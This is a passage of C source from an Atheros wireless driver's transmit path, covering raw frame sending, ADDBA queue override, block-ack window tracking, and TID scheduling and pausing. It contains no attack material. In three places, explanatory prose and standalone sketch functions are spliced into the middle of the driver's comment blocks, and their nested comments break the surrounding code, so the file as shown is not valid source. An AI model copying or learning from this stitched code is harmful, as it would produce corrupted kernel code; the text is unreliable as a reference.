ath_tx_findrix(sc, params->ibp_rate3); bf->bf_state.bfs_rc[3].rix = rix; bf->bf_state.bfs_rc[3].tries = params->ibp_try3; } /* * All the required rate control decisions have been made; * fill in the rc flags. */ ath_tx_rate_fill_rcflags(sc, bf); /* NB: no buffered multicast in power save support */ /* * If we're overiding the ADDBA destination, dump directly * into the hardware queue, right after any pending * frames to that node are. 
*/ DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: dooverride=%d\n", __func__, do_override); #if 1 /* * Put addba frames in the right place in the right TID/HWQ. */ if (do_override) { bf->bf_state.bfs_txflags |= HAL_TXDESC_CLRDMASK; /* * XXX if it's addba frames, should we be leaking * them out via the frame leak method? * XXX for now let's not risk it; but we may wish * to investigate this later. */ ath_tx_xmit_normal(sc, sc->sc_ac2q[pri], bf); } else if (ath_tx_should_swq_frame(sc, ATH_NODE(ni), m0, &queue_to_head)) { /* Queue to software queue */ ath_tx_swq(sc, ni, sc->sc_ac2q[pri], queue_to_head, bf); } else { bf->bf_state.bfs_txflags |= HAL_TXDESC_CLRDMASK; ath_tx_xmit_normal(sc, sc->sc_ac2q[pri], bf); } #else /* Direct-dispatch to the hardware */ bf->bf_state.bfs_txflags |= HAL_TXDESC_CLRDMASK; /* * Update the current leak count if * we're leaking frames; and set the * MORE flag as appropriate. */ ath_tx_leak_count_update(sc, tid, bf); ath_tx_xmit_normal(sc, sc->sc_ac2q[pri], bf); #endif return 0; } /* * Send a raw frame. * * This can be called by net80211. */ int ath_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct ath_softc *sc = ifp->if_softc; struct ath_buf *bf; struct ieee80211_frame *wh = mtod(m, struct ieee80211_frame *); int error = 0; ATH_PCU_LOCK(sc); if (sc->sc_inreset_cnt > 0) { DPRINTF(sc, ATH_DEBUG_XMIT, "%s: sc_inreset_cnt > 0; bailing\n", __func__); error = EIO; ATH_PCU_UNLOCK(sc); goto bad0; } sc->sc_txstart_cnt++; ATH_PCU_UNLOCK(sc); ATH_TX_LOCK(sc); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 || sc->sc_invalid) { DPRINTF(sc, ATH_DEBUG_XMIT, "%s: discard frame, %s", __func__, (ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 ? "!running" : "invalid"); m_freem(m); error = ENETDOWN; goto bad; } /* * Enforce how deep the multicast queue can grow. * * XXX duplicated in ath_tx_start(). */ if (IEEE80211_IS_MULTICAST(wh->i_addr1)) { if (sc->sc_cabq->axq_depth + sc->sc_cabq->fifo.axq_depth > sc->sc_txq_mcastq_maxdepth) { sc->sc_stats.ast_tx_mcastq_overflow++; error = ENOBUFS; } if (error != 0) { m_freem(m); goto bad; } } /* * Grab a TX buffer and associated resources. */ bf = ath_getbuf(sc, ATH_BUFTYPE_MGMT); if (bf == NULL) { sc->sc_stats.ast_tx_nobuf++; m_freem(m); error = ENOBUFS; goto bad; } ATH_KTR(sc, ATH_KTR_TX, 3, "ath_raw_xmit: m=%p, params=%p, bf=%p\n", m, params, bf); if (params == NULL) { /* * Legacy path; interpret frame contents to decide * precisely how to send the frame. */ if (ath_tx_start(sc, ni, bf, m)) { error = EIO; /* XXX */ goto bad2; } } else { /* * Caller supplied explicit parameters to use in * sending the frame. */ if (ath_tx_raw_start(sc, ni, bf, m, params)) { error = EIO; /* XXX */ goto bad2; } } sc->sc_wd_timer = 5; ifp->if_opackets++; sc->sc_stats.ast_tx_raw++; /* * Update the TIM - if there's anything queued to the * software queue and power save is enabled, we should * set the TIM. 
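For context on the TIM update mentioned above: the AP advertises buffered traffic to sleeping stations via a per-AID bitmap in the beacon. The sketch below is only a rough illustration of that idea, not net80211's implementation.

#include <stdint.h>

#define TIM_BITMAP_BYTES	(2008 / 8)	/* one bit per possible AID */

/* Set or clear a station's "traffic buffered" bit by association ID. */
static void
tim_mark(uint8_t bitmap[TIM_BITMAP_BYTES], uint16_t aid, int buffered)
{
	if (buffered)
		bitmap[aid / 8] |= (uint8_t)(1 << (aid % 8));
	else
		bitmap[aid / 8] &= (uint8_t)~(1 << (aid % 8));
}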
*/ ath_tx_update_tim(sc, ni, 1); ATH_TX_UNLOCK(sc); ATH_PCU_LOCK(sc); sc->sc_txstart_cnt--; ATH_PCU_UNLOCK(sc); return 0; bad2: ATH_KTR(sc, ATH_KTR_TX, 3, "ath_raw_xmit: bad2: m=%p, params=%p, " "bf=%p", m, params, bf); ATH_TXBUF_LOCK(sc); ath_returnbuf_head(sc, bf); ATH_TXBUF_UNLOCK(sc); bad: ATH_TX_UNLOCK(sc); ATH_PCU_LOCK(sc); sc->sc_txstart_cnt--; ATH_PCU_UNLOCK(sc); bad0: ATH_KTR(sc, ATH_KTR_TX, 2, "ath_raw_xmit: bad0: m=%p, params=%p", m, params); ifp->if_oerrors++; sc->sc_stats.ast_tx_raw_fail++; ieee80211_free_node(ni); return error; } /* Some helper functions */ /* * ADDBA (and potentially others) need to be placed in the same * hardware queue as the TID/node it's relating to. This is so * it goes out after any pending non-aggregate frames to the * same node/TID. * * If this isn't done, the ADDBA can go out before the frames * queued in hardware. Even though these frames have a sequence * number -earlier- than the ADDBA can be transmitted (but * no frames whose sequence numbers are after the ADDBA should * be!) they'll arrive after the ADDBA - and the receiving end * will simply drop them as being out of the BAW. * * The frames can't be appended to the TID software queue - it'll * never be sent out. So these frames have to be directly * dispatched to the hardware, rather than queued in software. * So if this function returns true, the TXQ has to be * overridden and it has to be directly dispatched. * * It's a dirty hack, but someone's gotta do it. */ /* * XXX doesn't belong here! */ static int ieee80211_is_action(struct ieee80211_frame *wh) { /* Type: Management frame? */ if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) != IEEE80211_FC0_TYPE_MGT) return 0; /* Subtype: Action frame? */ if ((wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) != IEEE80211_FC0_SUBTYPE_ACTION) return 0; return 1; } #define MS(_v, _f) (((_v) & _f) >> _f##_S) /* * Return an alternate TID for ADDBA request frames. * * Yes, this likely should be done in the net80211 layer. */ static int ath_tx_action_frame_override_queue(struct ath_softc *sc, struct ieee80211_node *ni, struct mbuf *m0, int *tid) { struct ieee80211_frame *wh = mtod(m0, struct ieee80211_frame *); struct ieee80211_action_ba_addbarequest *ia; uint8_t *frm; uint16_t baparamset; /* Not action frame? Bail */ if (! ieee80211_is_action(wh)) return 0; /* XXX Not needed for frames we send? */ #if 0 /* Correct length? */ if (! ieee80211_parse_action(ni, m)) return 0; #endif /* Extract out action frame */ frm = (u_int8_t *)&wh[1]; ia = (struct ieee80211_action_ba_addbarequest *) frm; /* Not ADDBA? Bail */ if (ia->rq_header.ia_category != IEEE80211_ACTION_CAT_BA) return 0; if (ia->rq_header.ia_action != IEEE80211_ACTION_BA_ADDBA_REQUEST) return 0; /* Extract TID, return it */ baparamset = le16toh(ia->rq_baparamset); *tid = (int) MS(baparamset, IEEE80211_BAPS_TID); return 1; } #undef MS /* Per-node software queue operations */ /* * Add the current packet to the given BAW. * It is assumed that the current packet * * + fits inside the BAW; * + already has had a sequence number allocated. * * Since the BAW status may be modified by both the ath task and * the net80211/ifnet contexts, the TID must be locked. */ void ath_tx_addto_baw(struct ath_softc *sc, struct ath_node *an, struct ath_tid *tid, struct ath_buf *bf) { int index, cindex; struct ieee80211_tx_ampdu *tap; ATH_TX_LOCK_ASSERT(sc); if (bf->bf_state.bfs_isretried) return; tap = ath_tx_get_tx_tid(an, tid->tid); if (! 
bf->bf_state.bfs_dobaw) { DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: dobaw=0, seqno=%d, window %d:%d\n", __func__, SEQNO(bf->bf_state.bfs_seqno), tap->txa_start, tap->txa_wnd); } if (bf->bf_state.bfs_addedbaw) DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: re-added? tid=%d, seqno %d; window %d:%d; " "baw head=%d tail=%d\n", __func__, tid->tid, SEQNO(bf->bf_state.bfs_seqno), tap->txa_start, tap->txa_wnd, tid->baw_head, tid->baw_tail); /* * Verify that the given sequence number is not outside of the * BAW. Complain loudly if that's the case. */ if (! BAW_WITHIN(tap->txa_start, tap->txa_wnd, SEQNO(bf->bf_state.bfs_seqno))) { DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: bf=%p: outside of BAW?? tid=%d, seqno %d; window %d:%d; " "baw head=%d tail=%d\n", __func__, bf, tid->tid, SEQNO(bf->bf_state.bfs_seqno), tap->txa_start, tap->txa_wnd, tid->baw_head, tid->baw_tail); } /* * ni->ni_txseqs[] is the currently allocated seqno. * the txa state contains the current baw start. */ index = ATH_BA_INDEX(tap->txa_start, SEQNO(bf->bf_state.bfs_seqno)); cindex = (tid->baw_head + index) & (ATH_TID_MAX_BUFS - 1); DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: tid=%d, seqno %d; window %d:%d; index=%d cindex=%d " "baw head=%d tail=%d\n", __func__, tid->tid, SEQNO(bf->bf_state.bfs_seqno), tap->txa_start, tap->txa_wnd, index, cindex, tid->baw_head, tid->baw_tail); #if 0 assert(tid->tx_buf[cindex] == NULL); #endif if (tid->tx_buf[cindex] != NULL) { DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: ba packet dup (index=%d, cindex=%d, " "head=%d, tail=%d)\n", __func__, index, cindex, tid->baw_head, tid->baw_tail); DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: BA bf: %p; seqno=%d ; new bf: %p; seqno=%d\n", __func__, tid->tx_buf[cindex], SEQNO(tid->tx_buf[cindex]->bf_state.bfs_seqno), bf, SEQNO(bf->bf_state.bfs_seqno) ); } tid->tx_buf[cindex] = bf; if (index >= ((tid->baw_tail - tid->baw_head) & (ATH_TID_MAX_BUFS - 1))) { tid->baw_tail = cindex; INCR(tid->baw_tail, ATH_TID_MAX_BUFS); } } /* * Flip the BAW buffer entry over from the existing one to the new one. * * When software retransmitting a (sub-)frame, it is entirely possible that * the frame ath_buf is marked as BUSY and can't be immediately reused. * In that instance the buffer is cloned and the new buffer is used for * retransmit. We thus need to update the ath_buf slot in the BAW buf * tracking array to maintain consistency. */ static void ath_tx_switch_baw_buf(struct ath_softc *sc, struct ath_node *an, struct ath_tid *tid, struct ath_buf *old_bf, struct ath_buf *new_bf) { int index, cindex; struct ieee80211_tx_ampdu *tap; int seqno = SEQNO(old_bf->bf_state.bfs_seqno); ATH_TX_LOCK_ASSERT(sc); tap = ath_tx_get_tx_tid(an, tid->tid); index = ATH_BA_INDEX(tap->txa_start, seqno); cindex = (tid->baw_head + index) & (ATH_TID_MAX_BUFS - 1); /* * Just warn for now; if it happens then we should find out * about it. It's highly likely the aggregation session will * soon hang. 
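The index/cindex arithmetic used by the BAW helpers above maps a sequence number onto a slot in a power-of-two ring of buffer pointers. A standalone sketch, with the ring size as an assumption chosen for illustration rather than the driver's constant:

#include <stdint.h>

#define SEQ_RANGE	4096
#define BAW_RING_SLOTS	64		/* must be a power of two */

/* Distance of seqno from the BAW left edge, with 12-bit wraparound. */
static int
baw_index(uint16_t baw_start, uint16_t seqno)
{
	return ((seqno - baw_start + SEQ_RANGE) % SEQ_RANGE);
}

/* Ring slot for that offset, given the current ring head. */
static int
baw_slot(int ring_head, int index)
{
	return ((ring_head + index) & (BAW_RING_SLOTS - 1));
}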
*/ if (old_bf->bf_state.bfs_seqno != new_bf->bf_state.bfs_seqno) { DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: retransmitted buffer" " has mismatching seqno's, BA session may hang.\n", __func__); DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: old seqno=%d, new_seqno=%d\n", __func__, old_bf->bf_state.bfs_seqno, new_bf->bf_state.bfs_seqno); } if (tid->tx_buf[cindex] != old_bf) { DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: ath_buf pointer incorrect; " " has m BA session may hang.\n", __func__); DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: old bf=%p, new bf=%p\n", __func__, old_bf, new_bf); } tid->tx_buf[cindex] = new_bf; } /* * seq_start - left edge of BAW * seq_next - current/next sequence number to allocate * * Since the BAW status may be modified by both the ath task and * the net80211/ifnet contexts, the TID must be locked. */ static void ath_tx_update_baw(struct ath_softc *sc, struct ath_node *an, struct ath_tid *tid, const struct ath_buf *bf) { int index, cindex; struct ieee80211_tx_ampdu *tap; int seqno = SEQNO(bf->bf_state.bfs_seqno); ATH_TX_LOCK_ASSERT(sc); tap = ath_tx_get_tx_tid(an, tid->tid); index = ATH_BA_INDEX(tap->txa_start, seqno); cindex = (tid->baw_head + index) & (ATH_TID_MAX_BUFS - 1); DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: tid=%d, baw=%d:%d, seqno=%d, index=%d, cindex=%d, " "baw head=%d, tail=%d\n", __func__, tid->tid, tap->txa_start, tap->txa_wnd, seqno, index, cindex, tid->baw_head, tid->baw_tail); /* * If this occurs then we have a big problem - something else * has slid tap->txa_start along without updating the BAW * tracking start/end pointers. Thus the TX BAW state is now * completely busted. * * But for now, since I haven't yet fixed TDMA and buffer cloning, * it's quite possible that a cloned buffer is making its way * here and causing it to fire off. Disable TDMA for now. */ if (tid->tx_buf[cindex] != bf) { DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: comp bf=%p, seq=%d; slot bf=%p, seqno=%d\n", __func__, bf, SEQNO(bf->bf_state.bfs_seqno), tid->tx_buf[cindex], (tid->tx_buf[cindex] != NULL) ? SEQNO(tid->tx_buf[cindex]->bf_state.bfs_seqno) : -1); } tid->tx_buf[cindex] = NULL; while (tid->baw_head != tid->baw_tail && !tid->tx_buf[tid->baw_head]) { INCR(tap->txa_start, IEEE80211_SEQ_RANGE); INCR(tid->baw_head, ATH_TID_MAX_BUFS); } DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: baw is now %d:%d, baw head=%d\n", __func__, tap->txa_start, tap->txa_wnd, tid->baw_head); } static void ath_tx_leak_count_update(struct ath_softc *sc, struct ath_tid *tid, struct ath_buf *bf) { struct ieee80211_frame *wh; ATH_TX_LOCK_ASSERT(sc); if (tid->an->an_leak_count > 0) { wh = mtod(bf->bf_m, struct ieee80211_frame *); /* * Update MORE based on the software/net80211 queue states. */ if ((tid->an->an_stack_psq > 0) || (tid->an->an_swq_depth > 0)) wh->i_fc[1] |= IEEE80211_FC1_MORE_DATA; else wh->i_fc[1] &= ~IEEE80211_FC1_MORE_DATA; DPRINTF(sc, ATH_DEBUG_NODE_PWRSAVE, "%s: %6D: leak count = %d, psq=%d, swq=%d, MORE=%d\n", __func__, tid->an->an_node.ni_macaddr, ":", tid->an->an_leak_count, tid->an->an_stack_psq, tid->an->an_swq_depth, !! (wh->i_fc[1] & IEEE80211_FC1_MORE_DATA)); /* * Re-sync the underlying buffer. */ bus_dmamap_sync(sc->sc_dmat, bf->bf_dmamap, BUS_DMASYNC_PREWRITE); tid->an->an_leak_count --; } } static int ath_tx_tid_can_tx_or_sched(struct ath_softc *sc, struct ath_tid *tid) { ATH_TX_LOCK_ASSERT(sc); if (tid->an->an_leak_count > 0) { return (1); } if (tid->paused) return (0); return (1); } /* * Mark the current node/TID as ready to TX. 
* * This is done to make it easy for the software scheduler to * find which nodes have data to send. * * The TXQ lock must be held. */ void ath_tx_tid_sched(struct ath_softc *sc, struct ath_tid *tid) { struct ath_txq *txq = sc->sc_ac2q[tid->ac]; ATH_TX_LOCK_ASSERT(sc); /* * If we are leaking out a frame to this destination * for PS-POLL, ensure that we allow scheduling to * occur. */ if (! ath_tx_tid_can_tx_or_sched(sc, tid)) return; /* paused, can't schedule yet */ if (tid->sched) return; /* already scheduled */ tid->sched = 1; #if 0 /* * If this is a sleeping node we're leaking to, given * it a higher priority. This is so bad for QoS it hurts. */ if (tid->an->an_leak_count) { TAILQ_INSERT_HEAD(&txq->axq_tidq, tid, axq_qelem); } else { TAILQ_INSERT_TAIL(&txq->axq_tidq, tid, axq_qelem); } #endif /* * We can't do the above - it'll confuse the TXQ software * scheduler which will keep checking the _head_ TID * in the list to see if it has traffic. If we queue * a TID to the head of the list and it doesn't transmit, * we'll check it again. * * So, get the rest of this leaking frames support working * and reliable first and _then_ optimise it so they're * pushed out in front of any other pending software * queued nodes. */ TAILQ_INSERT_TAIL(&txq->axq_tidq, tid, axq_qelem); } /* * Mark the current node as no longer needing to be polled for * TX packets. * * The TXQ lock must be held. */ static void ath_tx_tid_unsched(struct ath_softc *sc, struct ath_tid *tid) { struct ath_txq *txq = sc->sc_ac2q[tid->ac]; ATH_TX_LOCK_ASSERT(sc); if (tid->sched == 0) return; tid->sched = 0; TAILQ_REMOVE(&txq->axq_tidq, tid, axq_qelem); } /* * Assign a sequence number manually to the given frame. * * This should only be called for A-MPDU TX frames. */ static ieee80211_seq ath_tx_tid_seqno_assign(struct ath_softc *sc, struct ieee80211_node *ni, struct ath_buf *bf, struct mbuf *m0) { struct ieee80211_frame *wh; int tid, pri; ieee80211_seq seqno; uint8_t subtype; /* TID lookup */ wh = mtod(m0, struct ieee80211_frame *); pri = M_WME_GETAC(m0); /* honor classification */ tid = WME_AC_TO_TID(pri); DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: pri=%d, tid=%d, qos has seq=%d\n", __func__, pri, tid, IEEE80211_QOS_HAS_SEQ(wh)); /* XXX Is it a control frame? Ignore */ /* Does the packet require a sequence number? */ if (! IEEE80211_QOS_HAS_SEQ(wh)) return -1; ATH_TX_LOCK_ASSERT(sc); /* * Is it a QOS NULL Data frame? Give it a sequence number from * the default TID (IEEE80211_NONQOS_TID.) * * The RX path of everything I've looked at doesn't include the NULL * data frame sequence number in the aggregation state updates, so * assigning it a sequence number there will cause a BAW hole on the * RX side. */ subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; if (subtype == IEEE80211_FC0_SUBTYPE_QOS_NULL) { /* XXX no locking for this TID? This is a bit of a problem. */ seqno = ni->ni_txseqs[IEEE80211_NONQOS_TID]; INCR(ni->ni_txseqs[IEEE80211_NONQOS_TID], IEEE80211_SEQ_RANGE); } else { /* Manually assign sequence number */ seqno = ni->ni_txseqs[tid]; INCR(ni->ni_txseqs[tid], IEEE80211_SEQ_RANGE); } *(uint16_t *)&wh->i_seq[0] = htole16(seqno << IEEE80211_SEQ_SEQ_SHIFT); M_SEQNO_SET(m0, seqno); /* Return so caller can do something with it if needed */ DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: -> seqno=%d\n", __func__, seqno); return seqno; } /* * Attempt to direct dispatch an aggregate frame to hardware. * If the frame is out of BAW, queue. * Otherwise, schedule it as a single frame. 
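The "is this frame inside the BAW?" test that gates direct dispatch above has to respect 12-bit sequence wraparound; a minimal standalone sketch of that test (not the driver's macro) is:

#include <stdint.h>

#define SEQ_RANGE	4096

/*
 * A frame may be dispatched only if its seqno lies in
 * [start, start + wnd) modulo the sequence space; otherwise it waits
 * on the software queue until the window slides forward.
 */
static int
baw_within(uint16_t start, uint16_t wnd, uint16_t seqno)
{
	uint16_t offset = (uint16_t)((seqno - start + SEQ_RANGE) % SEQ_RANGE);

	return (offset < wnd);
}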
*/ static void ath_tx_xmit_aggr(struct ath_softc *sc, struct ath_node *an, struct ath_txq *txq, struct ath_buf *bf) { struct ath_tid *tid = &an->an_tid[bf->bf_state.bfs_tid]; struct ieee80211_tx_ampdu *tap; ATH_TX_LOCK_ASSERT(sc); tap = ath_tx_get_tx_tid(an, tid->tid); /* paused? queue */ if (! ath_tx_tid_can_tx_or_sched(sc, tid)) { ATH_TID_INSERT_HEAD(tid, bf, bf_list); /* XXX don't sched - we're paused! */ return; } /* outside baw? queue */ if (bf->bf_state.bfs_dobaw && (! BAW_WITHIN(tap->txa_start, tap->txa_wnd, SEQNO(bf->bf_state.bfs_seqno)))) { ATH_TID_INSERT_HEAD(tid, bf, bf_list); ath_tx_tid_sched(sc, tid); return; } /* * This is a temporary check and should be removed once * all the relevant code paths have been fixed. * * During aggregate retries, it's possible that the head * frame will fail (which has the bfs_aggr and bfs_nframes * fields set for said aggregate) and will be retried as * a single frame. In this instance, the values should * be reset or the completion code will get upset with you. */ if (bf->bf_state.bfs_aggr != 0 || bf->bf_state.bfs_nframes > 1) { DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: bfs_aggr=%d, bfs_nframes=%d\n", __func__, bf->bf_state.bfs_aggr, bf->bf_state.bfs_nframes); bf->bf_state.bfs_aggr = 0; bf->bf_state.bfs_nframes = 1; } /* Update CLRDMASK just before this frame is queued */ ath_tx_update_clrdmask(sc, tid, bf); /* Direct dispatch to hardware */ ath_tx_do_ratelookup(sc, bf); ath_tx_calc_duration(sc, bf); ath_tx_calc_protection(sc, bf); ath_tx_set_rtscts(sc, bf); ath_tx_rate_fill_rcflags(sc, bf); ath_tx_setds(sc, bf); /* Statistics */ sc->sc_aggr_stats.aggr_low_hwq_single_pkt++; /* Track per-TID hardware queue depth correctly */ tid->hwq_depth++; /* Add to BAW */ if (bf->bf_state.bfs_dobaw) { ath_tx_addto_baw(sc, an, tid, bf); bf->bf_state.bfs_addedbaw = 1; } /* Set completion handler, multi-frame aggregate or not */ bf->bf_comp = ath_tx_aggr_comp; /* * Update the current leak count if * we're leaking frames; and set the * MORE flag as appropriate. */ ath_tx_leak_count_update(sc, tid, bf); /* Hand off to hardware */ ath_tx_handoff(sc, txq, bf); } /* * Attempt to send the packet. * If the queue isn't busy, direct-dispatch. * If the queue is busy enough, queue the given packet on the * relevant software queue. */ void ath_tx_swq(struct ath_softc *sc, struct ieee80211_node *ni, struct ath_txq *txq, int queue_to_head, struct ath_buf *bf) { struct ath_node *an = ATH_NODE(ni); struct ieee80211_frame *wh; struct ath_tid *atid; int pri, tid; struct mbuf *m0 = bf->bf_m; ATH_TX_LOCK_ASSERT(sc); /* Fetch the TID - non-QoS frames get assigned to TID 16 */ wh = mtod(m0, struct ieee80211_frame *); pri = ath_tx_getac(sc, m0); tid = ath_tx_gettid(sc, m0); atid = &an->an_tid[tid]; DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: bf=%p, pri=%d, tid=%d, qos=%d\n", __func__, bf, pri, tid, IEEE80211_QOS_HAS_SEQ(wh)); /* Set local packet state, used to queue packets to hardware */ /* XXX potentially duplicate info, re-check */ bf->bf_state.bfs_tid = tid; bf->bf_state.bfs_tx_queue = txq->axq_qnum; bf->bf_state.bfs_pri = pri; /* * If the hardware queue isn't busy, queue it directly. * If the hardware queue is busy, queue it. * If the TID is paused or the traffic it outside BAW, software * queue it. * * If the node is in power-save and we're leaking a frame, * leak a single frame. */ if (! 
ath_tx_tid_can_tx_or_sched(sc, atid)) { /* TID is paused, queue */ DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: paused\n", __func__); /* * If the caller requested that it be sent at a high * priority, queue it at the head of the list. */ if (queue_to_head) ATH_TID_INSERT_HEAD(atid, bf, bf_list); else ATH_TID_INSERT_TAIL(atid, bf, bf_list); } else if (ath_tx_ampdu_pending(sc, an, tid)) { /* AMPDU pending; queue */ DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: pending\n", __func__); ATH_TID_INSERT_TAIL(atid, bf, bf_list); /* XXX sched? */ } else if (ath_tx_ampdu_running(sc, an, tid)) { /* AMPDU running, attempt direct dispatch if possible */ /* * Always queue the frame to the tail of the list. */ ATH_TID_INSERT_TAIL(atid, bf, bf_list); /* * If the hardware queue isn't busy, direct dispatch * the head frame in the list. Don't schedule the * TID - let it build some more frames first? * * When running A-MPDU, always just check the hardware * queue depth against the aggregate frame limit. * We don't want to burst a large number of single frames * out to the hardware; we want to aggressively hold back. * * Otherwise, schedule the TID. */ /* XXX TXQ locking */ if (txq->axq_depth + txq->fifo.axq_depth < sc->sc_hwq_limit_aggr) { bf = ATH_TID_FIRST(atid); ATH_TID_REMOVE(atid, bf, bf_list); /* * Ensure it's definitely treated as a non-AMPDU * frame - this information may have been left * over from a previous attempt. */ bf->bf_state.bfs_aggr = 0; bf->bf_state.bfs_nframes = 1; /* Queue to the hardware */ ath_tx_xmit_aggr(sc, an, txq, bf); DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: xmit_aggr\n", __func__); } else { DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: ampdu; swq'ing\n", __func__); ath_tx_tid_sched(sc, atid); } /* * If we're not doing A-MPDU, be prepared to direct dispatch * up to both limits if possible. This particular corner * case may end up with packet starvation between aggregate * traffic and non-aggregate traffic: we wnat to ensure * that non-aggregate stations get a few frames queued to the * hardware before the aggregate station(s) get their chance. * * So if you only ever see a couple of frames direct dispatched * to the hardware from a non-AMPDU client, check both here * and in the software queue dispatcher to ensure that those * non-AMPDU stations get a fair chance to transmit. */ /* XXX TXQ locking */ } else if ((txq->axq_depth + txq->fifo.axq_depth < sc->sc_hwq_limit_nonaggr) && (txq->axq_aggr_depth < sc->sc_hwq_limit_aggr)) { /* AMPDU not running, attempt direct dispatch */ DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: xmit_normal\n", __func__); /* See if clrdmask needs to be set */ ath_tx_update_clrdmask(sc, atid, bf); /* * Update the current leak count if * we're leaking frames; and set the * MORE flag as appropriate. */ ath_tx_leak_count_update(sc, atid, bf); /* * Dispatch the frame. */ ath_tx_xmit_normal(sc, txq, bf); } else { /* Busy; queue */ DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: swq'ing\n", __func__); ATH_TID_INSERT_TAIL(atid, bf, bf_list); ath_tx_tid_sched(sc, atid); } } /* * Only set the clrdmask bit if none of the nodes are currently * filtered. * * XXX TODO: go through all the callers and check to see * which are being called in the context of looping over all * TIDs (eg, if all tids are being paused, resumed, etc.) * That'll avoid O(n^2) complexity here. */ static void ath_tx_set_clrdmask(struct ath_softc *sc, struct ath_node *an) { int i; ATH_TX_LOCK_ASSERT(sc); for (i = 0; i < IEEE80211_TID_SIZE; i++) { if (an->an_tid[i].isfiltered == 1) return; } an->clrdmask = 1; } /* * Configure the per-TID node state. 
* * This likely belongs in if_ath_node.c but I can't think of anywhere * else to put it just yet. * * This sets up the SLISTs and the mutex as appropriate. */ void ath_tx_tid_init(struct ath_softc *sc, struct ath_node *an) { int i, j; struct ath_tid *atid; for (i = 0; i < IEEE80211_TID_SIZE; i++) { atid = &an->an_tid[i]; /* XXX now with this bzer(), is the field 0'ing needed? */ bzero(atid, sizeof(*atid)); TAILQ_INIT(&atid->tid_q); TAILQ_INIT(&atid->filtq.tid_q); atid->tid = i; atid->an = an; for (j = 0; j < ATH_TID_MAX_BUFS; j++) atid->tx_buf[j] = NULL; atid->baw_head = atid->baw_tail = 0; atid->paused = 0; atid->sched = 0; atid->hwq_depth = 0; atid->cleanup_inprogress = 0; if (i == IEEE80211_NONQOS_TID) atid->ac = ATH_NONQOS_TID_AC; else atid->ac = TID_TO_WME_AC(i); } an->clrdmask = 1; /* Always start by setting this bit */ } /* * Pause the current TID. This stops packets from being transmitted * on it. * * Since this is also called from upper layers as well as the driver, * it will get the TID lock. */ static void ath_tx_tid_pause(struct ath_softc *sc, struct ath_tid *tid) { ATH_TX_LOCK_ASSERT(sc); tid->paused++; DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: paused = %d\n", __func__, tid->paused); } /* * Unpause the current TID, and schedule it if needed. */ static void ath_tx_tid_resume(struct ath_softc *sc, struct ath_tid *tid) { ATH_TX_LOCK_ASSERT(sc); /* * There's some odd places where ath_tx_tid_resume() is called * when it shouldn't be; this works around that particular issue * until it's actually resolved. */ if (tid->paused == 0) { DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: %6D: paused=0?\n", __func__, tid->an->an_node.ni_macaddr, ":"); } else { tid->paused--; } DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: unpaused = %d\n", __func__, tid->paused); if (tid->paused) return; /* * Override the clrdmask configuration for the next frame * from this TID, just to get the ball rolling. */ ath_tx_set_clrdmask(sc, tid->an); if (tid->axq_depth == 0) return; /* XXX isfiltered shouldn't ever be 0 at this point */ if (tid->isfiltered == 1) { DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: filtered?!\n", __func__); return; } ath_tx_tid_sched(sc, tid); /* * Queue the software TX scheduler. */ ath_tx_swq_kick(sc); } /* * Add the given ath_buf to the TID filtered frame list. * This requires the TID be filtered. */ static void ath_tx_tid_filt_addbuf(struct ath_softc *sc, struct ath_tid *tid, struct ath_buf *bf) { ATH_TX_LOCK_ASSERT(sc); if (!tid->isfiltered) DPRINTF(sc, ATH_DEBUG_SW_TX_FILT, "%s: not filtered?!\n", __func__); DPRINTF(sc, ATH_DEBUG_SW_TX_FILT, "%s: bf=%p\n", __func__, bf); /* Set the retry bit and bump the retry counter */ ath_tx_set_retry(sc, bf); sc->sc_stats.ast_tx_swfiltered++; ATH_TID_FILT_INSERT_TAIL(tid, bf, bf_list); } /* * Handle a completed filtered frame from the given TID. * This just enables/pauses the filtered frame state if required * and appends the filtered frame to the filtered queue. */ static void ath_tx_tid_filt_comp_buf(struct ath_softc *sc, struct ath_tid *tid, struct ath_buf *bf) { ATH_TX_LOCK_ASSERT(sc); if (! tid->isfiltered) { DPRINTF(sc, ATH_DEBUG_SW_TX_FILT, "%s: filter transition\n", __func__); tid->isfiltered = 1; ath_tx_tid_pause(sc, tid); } /* Add the frame to the filter queue */ ath_tx_tid_filt_addbuf(sc, tid, bf); } /* * Complete the filtered frame TX completion. * * If there are no more frames in the hardware queue, unpause/unfilter * the TID if applicable. Otherwise we will wait for a node PS transition * to unfilter. 
